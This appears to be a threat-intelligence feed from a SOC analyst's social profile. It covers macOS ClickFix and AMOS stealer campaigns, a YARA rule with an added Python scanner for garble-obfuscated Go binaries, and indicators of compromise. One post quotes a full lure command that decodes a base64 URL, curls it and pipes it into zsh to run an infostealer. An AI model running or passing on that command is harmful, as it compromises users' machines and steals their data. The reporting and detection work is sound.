Anton @BigToni94

15 posts

Senior SOC Analyst at Exness and Batman in my free time

Joined April 2021
8 Following, 70 Followers
Anton @BigToni94:
The core logic looks like this:

$garble_buildinfo = { FF 20 47 6F 20 62 75 69 6C 64 69 6E 66 3A [8-128] 07 75 6E 6B 6E 6F 77 6E }

This matches the Go buildinfo magic (0xff + ASCII " Go buildinf:") followed by linker TLV fields and a UTF-8 version record set to "unknown" — a layout commonly produced by garble instead of something like "\x08go1.22.0". As a result, I found a number of interesting samples on ANY.RUN, including binaries for multiple platforms. Maybe this will be useful to someone. It's still more fun than AI slops with emojis.

#malware #obfuscation #go #macos #detection #yara #soc
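The following is an added example, not code from Anton's post or from the garble project: a small Python scanner that applies the same matching logic as the YARA hex string above to raw bytes, and additionally parses the Go buildinfo header so the reported toolchain version can be read out and compared with "unknown". It assumes the standard Go buildinfo layout (a 32-byte header: 14-byte magic, pointer size, flags, 16 bytes of pointers or padding, with flag bit 0x2 meaning the version and module strings follow inline at offset 32 as uvarint-length-prefixed strings). The sample "binaries" it scans are constructed in the script; no real samples are involved.

```python
# Added example (not from the original post): re-implements the YARA pattern
#   FF 20 47 6F 20 62 75 69 6C 64 69 6E 66 3A [8-128] 07 75 6E 6B 6E 6F 77 6E
# over raw bytes and parses the Go buildinfo header to extract the version.
#
# Assumed (standard Go toolchain layout, not stated in the post): 32-byte header =
# 14-byte magic + ptrSize + flags + 16 bytes; with flag 0x2 set the version string
# sits at offset 32 as a uvarint-length-prefixed string. Samples are constructed.
from __future__ import annotations

GO_BUILDINFO_MAGIC = b"\xff Go buildinf:"   # FF 20 47 6F 20 62 75 69 6C 64 69 6E 66 3A
UNKNOWN_VERSION_RECORD = b"\x07unknown"     # 07 75 6E 6B 6E 6F 77 6E
HEADER_LEN = 32
FLAG_VERSION_INLINE = 0x2
MIN_GAP, MAX_GAP = 8, 128                   # the [8-128] jump in the YARA rule


def find_garble_like_buildinfo(data: bytes) -> list[dict]:
    """Every offset where the YARA pattern would match: magic, then 8..128
    bytes of anything, then the 'unknown' version record."""
    hits = []
    start = 0
    while (idx := data.find(GO_BUILDINFO_MAGIC, start)) >= 0:
        magic_end = idx + len(GO_BUILDINFO_MAGIC)
        lo = magic_end + MIN_GAP
        hi = magic_end + MAX_GAP + len(UNKNOWN_VERSION_RECORD)  # end is exclusive
        rec = data.find(UNKNOWN_VERSION_RECORD, lo, hi)
        if rec >= 0:
            hits.append({"magic_offset": idx, "version_offset": rec, "gap": rec - magic_end})
        start = idx + 1
    return hits


def _read_uvarint(data: bytes, pos: int) -> tuple[int, int]:
    """Decode a Go-style unsigned varint; returns (value, position after it)."""
    value, shift = 0, 0
    while True:
        b = data[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if b < 0x80:
            return value, pos
        shift += 7


def read_go_version(data: bytes) -> str | None:
    """Version string from the first Go buildinfo header, or None when there is
    no header or the version is stored behind a pointer (pre-1.18 layout)."""
    idx = data.find(GO_BUILDINFO_MAGIC)
    if idx < 0 or idx + HEADER_LEN > len(data):
        return None
    flags = data[idx + 15]
    if not flags & FLAG_VERSION_INLINE:
        return None
    length, pos = _read_uvarint(data, idx + HEADER_LEN)
    return data[pos:pos + length].decode("utf-8", errors="replace")


def classify(data: bytes) -> str:
    """Triage verdict: YARA-style hit, a readable Go version, or nothing useful."""
    if find_garble_like_buildinfo(data):
        return "go-buildinfo-version-unknown (garble-like)"
    version = read_go_version(data)
    if version is None:
        return "no-inline-go-buildinfo"
    return f"go-buildinfo-version:{version}"


def _make_sample(version: bytes) -> bytes:
    """Constructed stand-in for a Go binary: padding, 32-byte header, version
    record, empty module record. Not a real executable."""
    header = GO_BUILDINFO_MAGIC + b"\x08" + bytes([FLAG_VERSION_INLINE]) + b"\x00" * 16
    body = bytes([len(version)]) + version + b"\x00"
    return b"\x00" * 40 + header + body + b"\x00" * 16


NORMAL_SAMPLE = _make_sample(b"go1.22.0")   # what an unobfuscated build reports
GARBLED_SAMPLE = _make_sample(b"unknown")   # the layout the rule is after
NOT_GO_SAMPLE = b"MZ" + b"\x00" * 100       # no buildinfo at all

if __name__ == "__main__":
    for name, blob in (("normal", NORMAL_SAMPLE), ("garbled", GARBLED_SAMPLE), ("not-go", NOT_GO_SAMPLE)):
        print(f"{name:8s} -> {classify(blob)}")
```

In the constructed samples the version record sits 18 bytes after the magic (offset 32 minus the 14-byte magic), comfortably inside the rule's 8..128 window. Treat a hit as a triage signal for a stripped or obfuscated Go build, not as a conviction on its own: pair it with the usual context (signer, origin, behaviour in the sandbox).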
Anton @BigToni94:
It’s getting ridiculous how little effort Google seems to put into stopping ClickFix campaigns abusing its own infrastructure. Attackers are actively using sites.google.com for phishing pages, while Google Ads keeps promoting malicious domains with well-known and easily recognizable patterns. Companies cannot realistically block Google infrastructure entirely, so it would be great if Google actually took responsibility for protecting users instead of just hosting the abuse. Right now the workflow seems to be:

1. Take money from attackers for ads
2. Deliver malware to users
3. Remove the content after enough reports

This should not be the normal state of the internet in 2026.

#ClickFix #macOS #malware #phishing #security #google
Anton @BigToni94:
New AMOS campaign details. Attackers are using a phishing page hosted on sites.google.com, tricking users into executing a malicious command in Terminal:

hxxps://api-metrics-5453[.]com/curl/3e97b0eddfddb28e10008f9348381b2665e1ad12476315b24a64808696c3347b

The bash script downloads and launches the next-stage stager: “helper”. “helper” is a heavily obfuscated loader/dropper. It does not steal data directly, but prepares and launches the next stage (AMOS stealer + backdoor). The rest you already know.

Infrastructure:
• api-metrics-5453[.]com — first stage
• prismdata48[.]com — phishing site
• solidlattice65[.]com — phishing site

#AMOS #STEALER #macOS #malware #detection
Anton @BigToni94:
New ClickFix attack observed. This time, the attackers mimicked a fake Homebrew website. Execution of the terminal command launches an AppleScript-based stealer via osascript. Additionally, if the victim has "Trezor Suite.app" installed, the malware drops a malicious /Contents/Resources/app.asar (Electron app) to steal user data.

IoCs:
• bcrealestateagency[.]com — C2 domain
• checkbabikme[.]com — phishing resource
• 0d9db8ab9ae36598db07a0a364b156ee6c3c11a44946077efee409855518c4b6 — SHA256 of malicious app.asar

#malware #macos #ClickFix #SOC #ThreadDetection #stealer
Anton @BigToni94:
Recently discovered another phishing resource leveraging the ClickFix pattern. The victim is instructed to execute the following command in Terminal:

echo "Downloading Codex: https://persistent.oaistatic[.]com/codex-app-prod/Codex.dmg" && curl -s $(echo "aHR0cHM6Ly9hcmJva2ZpbmQuY29tL2N1cmwvMDMyNmJiNjRhMTUyNWNkMTlkMGQ5YWE3MmZmOGZhOWVlY2NmNmVhNWY1NWIwZTJmY2MwMzk2YWM2MjNhM2Q3OQ==" | openssl base64 -d -A) | zsh

Result: execution of an infostealer on the victim’s macOS host. Microsoft recently published related research on similar campaigns: microsoft.com/en-us/security…

IoCs:
• ClickFix lure website: devvtracker[.]com
• C2 domain hosting stager: arbokfind[.]com
• C2 IP receiving stolen data: 45.94.47[.]112

#ClickFix #Malware #Stealer #macOS #SOC #ThreatDetection
Anton reposted:

Janggggg @testanull:
I just published Microsoft Exchange From Deserialization to Post-Auth RCE (CVE-2021-28482) link.medium.com/a2T3FpCjLfb